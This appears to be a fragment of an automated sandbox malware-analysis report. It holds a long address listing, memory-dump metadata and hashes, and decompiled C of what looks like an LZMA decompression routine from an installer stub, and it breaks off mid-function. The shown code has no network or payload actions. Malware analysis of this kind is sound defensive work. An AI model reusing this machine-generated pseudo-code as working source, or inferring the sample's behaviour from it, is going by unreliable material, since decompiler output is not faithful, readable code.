                                                    0x00406f9b
                                                    0x0040714a
                                                    0x00407160
                                                    0x00407168
                                                    0x0040716f
                                                    0x00407171
                                                    0x00407178
                                                    0x0040717c
                                                    0x0040717c
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x0040675e
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d7
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x00000000
                                                    0x004070c9
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00406943
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c0a
                                                    0x00406c0d
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406be9
                                                    0x00406bec
                                                    0x00406bef
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406c02
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c3a
                                                    0x00406c3c
                                                    0x00406c40
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca2
                                                    0x00406ca5
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406c9d
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00406cd8
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00406ce1
                                                    0x00406ce1
                                                    0x00406ce4
                                                    0x00406ceb
                                                    0x00406cf0
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d7e
                                                    0x00406d7e
                                                    0x00406d82
                                                    0x00407120
                                                    0x00000000
                                                    0x00407120
                                                    0x00406d88
                                                    0x00406d8b
                                                    0x00406d8e
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9b
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406d9d
                                                    0x00406da0
                                                    0x00406da3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406973
                                                    0x00406973
                                                    0x00406977
                                                    0x004070e4
                                                    0x00000000
                                                    0x004070e4
                                                    0x0040697d
                                                    0x00406980
                                                    0x00406983
                                                    0x00406987
                                                    0x0040698a
                                                    0x00406990
                                                    0x00406992
                                                    0x00406992
                                                    0x00406992
                                                    0x00406995
                                                    0x00406998
                                                    0x00406998
                                                    0x0040699b
                                                    0x0040699e
                                                    0x00000000
                                                    0x00000000
                                                    0x004069a4
                                                    0x004069aa
                                                    0x00000000
                                                    0x00000000
                                                    0x004069b0
                                                    0x004069b0
                                                    0x004069b4
                                                    0x004069b7
                                                    0x004069ba
                                                    0x004069bd
                                                    0x004069c0
                                                    0x004069c1
                                                    0x004069c4
                                                    0x004069c6
                                                    0x004069cc
                                                    0x004069cf
                                                    0x004069d2
                                                    0x004069d5
                                                    0x004069d8
                                                    0x004069db
                                                    0x004069de
                                                    0x004069fa
                                                    0x004069fd
                                                    0x00406a00
                                                    0x00406a03
                                                    0x00406a0a
                                                    0x00406a0e
                                                    0x00406a10
                                                    0x00406a14
                                                    0x004069e0
                                                    0x004069e0
                                                    0x004069e4
                                                    0x004069ec
                                                    0x004069f1
                                                    0x004069f3
                                                    0x004069f5
                                                    0x004069f5
                                                    0x00406a17
                                                    0x00406a1e
                                                    0x00406a21
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a27
                                                    0x00000000
                                                    0x00406a2c
                                                    0x00406a2c
                                                    0x00406a30
                                                    0x004070f0
                                                    0x00000000
                                                    0x004070f0
                                                    0x00406a36
                                                    0x00406a39
                                                    0x00406a3c
                                                    0x00406a40
                                                    0x00406a43
                                                    0x00406a49
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4b
                                                    0x00406a4e
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a51
                                                    0x00406a57
                                                    0x00000000
                                                    0x00000000
                                                    0x00406a59
                                                    0x00406a5c
                                                    0x00406a5f
                                                    0x00406a62
                                                    0x00406a65
                                                    0x00406a68
                                                    0x00406a6b
                                                    0x00406a6e
                                                    0x00406a71
                                                    0x00406a74
                                                    0x00406a77
                                                    0x00406a8f
                                                    0x00406a92
                                                    0x00406a95
                                                    0x00406a98
                                                    0x00406a98
                                                    0x00406a9b
                                                    0x00406a9f
                                                    0x00406aa1
                                                    0x00406a79
                                                    0x00406a79
                                                    0x00406a81
                                                    0x00406a86
                                                    0x00406a88
                                                    0x00406a8a
                                                    0x00406a8a
                                                    0x00406aa4
                                                    0x00406aab
                                                    0x00406aae
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00000000
                                                    0x00406ab0
                                                    0x00406aae
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00406ab5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406af0
                                                    0x00406af0
                                                    0x00406af4
                                                    0x004070fc
                                                    0x00000000
                                                    0x004070fc
                                                    0x00406afa
                                                    0x00406afd
                                                    0x00406b00
                                                    0x00406b04
                                                    0x00406b07
                                                    0x00406b0d
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b0f
                                                    0x00406b12
                                                    0x00406b15
                                                    0x00406b15
                                                    0x00406b1b
                                                    0x00406ab9
                                                    0x00406ab9
                                                    0x00406abc
                                                    0x00000000
                                                    0x00406abc
                                                    0x00406b1d
                                                    0x00406b1d
                                                    0x00406b20
                                                    0x00406b23
                                                    0x00406b26
                                                    0x00406b29
                                                    0x00406b2c
                                                    0x00406b2f
                                                    0x00406b32
                                                    0x00406b35
                                                    0x00406b38
                                                    0x00406b3b
                                                    0x00406b53
                                                    0x00406b56
                                                    0x00406b59
                                                    0x00406b5c
                                                    0x00406b5c
                                                    0x00406b5f
                                                    0x00406b63
                                                    0x00406b65
                                                    0x00406b3d
                                                    0x00406b3d
                                                    0x00406b45
                                                    0x00406b4a
                                                    0x00406b4c
                                                    0x00406b4e
                                                    0x00406b4e
                                                    0x00406b68
                                                    0x00406b6f
                                                    0x00406b72
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406b74
                                                    0x00000000
                                                    0x00406e01
                                                    0x00406e01
                                                    0x00406e05
                                                    0x0040712c
                                                    0x00000000
                                                    0x0040712c
                                                    0x00406e0b
                                                    0x00406e0e
                                                    0x00406e11
                                                    0x00406e15
                                                    0x00406e18
                                                    0x00406e1e
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bd1
                                                    0x00406bd1
                                                    0x00406bd4
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f10
                                                    0x00406f14
                                                    0x00406f36
                                                    0x00406f39
                                                    0x00406f43
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406f46
                                                    0x00406f46
                                                    0x00406f16
                                                    0x00406f19
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f20
                                                    0x00406f23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406fcd
                                                    0x00406fd1
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406fef
                                                    0x00406ff6
                                                    0x00406ffd
                                                    0x00407004
                                                    0x00407004
                                                    0x00000000
                                                    0x00407004
                                                    0x00406fd3
                                                    0x00406fd6
                                                    0x00406fd9
                                                    0x00406fdc
                                                    0x00406fe3
                                                    0x00406f27
                                                    0x00406f27
                                                    0x00406f2a
                                                    0x00000000
                                                    0x00000000
                                                    0x004070be
                                                    0x004070c1
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cf8
                                                    0x00406cfa
                                                    0x00406d01
                                                    0x00406d02
                                                    0x00406d04
                                                    0x00406d07
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0f
                                                    0x00406d12
                                                    0x00406d15
                                                    0x00406d17
                                                    0x00406d19
                                                    0x00406d19
                                                    0x00406d1a
                                                    0x00406d1d
                                                    0x00406d24
                                                    0x00406d27
                                                    0x00406d35
                                                    0x00000000
                                                    0x00000000
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00000000
                                                    0x00000000
                                                    0x0040701a
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00000000
                                                    0x00407156
                                                    0x00407024
                                                    0x00407027
                                                    0x0040702a
                                                    0x0040702e
                                                    0x00407031
                                                    0x00407037
                                                    0x00407039
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00407042
                                                    0x00407042
                                                    0x00407046
                                                    0x004070a6
                                                    0x004070a9
                                                    0x004070ae
                                                    0x004070af
                                                    0x004070b1
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00406fc8
                                                    0x00406fc2
                                                    0x00407048
                                                    0x0040704e
                                                    0x00407051
                                                    0x00407054
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407066
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407088
                                                    0x0040708b
                                                    0x0040708f
                                                    0x00407091
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x00407073
                                                    0x00407078
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x00407098
                                                    0x0040709f
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x004070a1
                                                    0x00000000
                                                    0x00406d3d
                                                    0x00406d40
                                                    0x00406d76
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea6
                                                    0x00406ea9
                                                    0x00406ea9
                                                    0x00406eac
                                                    0x00406eae
                                                    0x00407138
                                                    0x00000000
                                                    0x00407138
                                                    0x00406eb4
                                                    0x00406eb7
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ebd
                                                    0x00406ec1
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00406ec4
                                                    0x00000000
                                                    0x00406ec4
                                                    0x00406d42
                                                    0x00406d44
                                                    0x00406d46
                                                    0x00406d48
                                                    0x00406d4b
                                                    0x00406d4c
                                                    0x00406d4e
                                                    0x00406d50
                                                    0x00406d53
                                                    0x00406d56
                                                    0x00406d6c
                                                    0x00406d71
                                                    0x00406da9
                                                    0x00406da9
                                                    0x00406dad
                                                    0x00406dd9
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406de5
                                                    0x00406de8
                                                    0x00406de8
                                                    0x00406ded
                                                    0x00406ded
                                                    0x00406def
                                                    0x00406df2
                                                    0x00406df9
                                                    0x00406dfc
                                                    0x00406e29
                                                    0x00406e29
                                                    0x00406e2c
                                                    0x00406e2f
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00406ea3
                                                    0x00000000
                                                    0x00406ea3
                                                    0x00406e31
                                                    0x00406e37
                                                    0x00406e3a
                                                    0x00406e3d
                                                    0x00406e40
                                                    0x00406e43
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4c
                                                    0x00406e4f
                                                    0x00406e52
                                                    0x00406e6b
                                                    0x00406e6d
                                                    0x00406e70
                                                    0x00406e71
                                                    0x00406e74
                                                    0x00406e76
                                                    0x00406e79
                                                    0x00406e7b
                                                    0x00406e7d
                                                    0x00406e80
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e89
                                                    0x00406e8b
                                                    0x00406e8b
                                                    0x00406e8c
                                                    0x00406e8f
                                                    0x00406e92
                                                    0x00406e54
                                                    0x00406e54
                                                    0x00406e5c
                                                    0x00406e61
                                                    0x00406e63
                                                    0x00406e66
                                                    0x00406e66
                                                    0x00406e95
                                                    0x00406e9c
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00406e26
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00000000
                                                    0x00406e9e
                                                    0x00406e9c
                                                    0x00406daf
                                                    0x00406db2
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbd
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc5
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00406dc8
                                                    0x00406dcb
                                                    0x00406dd2
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00406da6
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00000000
                                                    0x00406dd4
                                                    0x00406dd2
                                                    0x00406d58
                                                    0x00406d5b
                                                    0x00406d5d
                                                    0x00406d60
                                                    0x00000000
                                                    0x00000000
                                                    0x00406abf
                                                    0x00406abf
                                                    0x00406ac3
                                                    0x00407108
                                                    0x00000000
                                                    0x00407108
                                                    0x00406ac9
                                                    0x00406acc
                                                    0x00406acf
                                                    0x00406ad2
                                                    0x00406ad5
                                                    0x00406ad8
                                                    0x00406adb
                                                    0x00406add
                                                    0x00406ae0
                                                    0x00406ae3
                                                    0x00406ae6
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00406ae8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c4a
                                                    0x00406c4a
                                                    0x00406c4e
                                                    0x00407114
                                                    0x00000000
                                                    0x00407114
                                                    0x00406c54
                                                    0x00406c57
                                                    0x00406c5a
                                                    0x00406c5d
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c5f
                                                    0x00406c62
                                                    0x00406c65
                                                    0x00406c68
                                                    0x00406c6b
                                                    0x00406c6e
                                                    0x00406c71
                                                    0x00406c72
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c74
                                                    0x00406c77
                                                    0x00406c7a
                                                    0x00406c7d
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c80
                                                    0x00406c83
                                                    0x00406c85
                                                    0x00406c85
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ec7
                                                    0x00406ecb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ed1
                                                    0x00406ed4
                                                    0x00406ed7
                                                    0x00406eda
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edc
                                                    0x00406edf
                                                    0x00406ee2
                                                    0x00406ee5
                                                    0x00406ee8
                                                    0x00406eeb
                                                    0x00406eee
                                                    0x00406eef
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef1
                                                    0x00406ef4
                                                    0x00406ef7
                                                    0x00406efa
                                                    0x00406efd
                                                    0x00406f00
                                                    0x00406f04
                                                    0x00406f06
                                                    0x00406f09
                                                    0x00000000
                                                    0x00406f0b
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406f09
                                                    0x0040713e
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x00407175
                                                    0x00407175
                                                    0x00000000
                                                    0x00407175
                                                    0x00406fc2
                                                    0x00406f49
                                                    0x00406f46
                                                    0x00000000
                                                    0x00406b7d

                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                    • Instruction ID: b22102ba0a97a3123bbdfffdcb3b598a66073f742a3c91e931c35cfd39b2e4d0
                                                    • Opcode Fuzzy Hash: 149a1ea87bad9471ec2d26afc2e1eb54ca0b669066d2141da6cfc8ccdd9a5e64
                                                    • Instruction Fuzzy Hash: 2B712271D04229DBDF28CFA8C884BADBBB1FB44305F15806AD806BB291C7789996DF44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406C97 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00406C97() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
